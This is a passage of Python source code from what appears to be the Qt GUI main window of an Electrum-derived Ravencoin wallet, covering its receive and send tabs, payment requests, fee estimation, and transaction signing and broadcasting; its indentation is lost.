else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
status_text = ""
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
local_height = self.network.get_local_height()
server_lag = local_height - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
bal = self.wallet.get_balance()['RVN']
c = bal[0]
u = bal[1]
x = bal[2]
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
if local_height < server_height-100:
status_text = "Syncing headers {}/{}".format(local_height,server_height)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_label.setText(status_text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.asset_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_asset(self, asset):
from . import asset_dialog
d = asset_dialog.AssetDialog(self, asset)
d.exec_()
def mark_asset_as_spam(self, asset):
self.asset_blacklist.append('^'+asset+'$')
self.config.set_key('asset_blacklist', self.asset_blacklist, True)
self.asset_list.update()
self.history_model.refresh('Marked asset as spam')
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Ravencoin address where the payment should be received. Note that each payment request uses a different Ravencoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Ravencoin addresses.'),
_('The ravencoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = ravencoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
self.asset_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not ravencoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Ravencoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Ravencoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Ravencoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
script = ravencoin.address_to_script(addr)
outputs = [TxOutput(_type, addr, amount, False, '', script)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Ravencoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not ravencoin.is_address(o.address):
self.show_error(_('Invalid Ravencoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#use_rbf = self.config.get('use_rbf', True)
#if use_rbf:
# tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
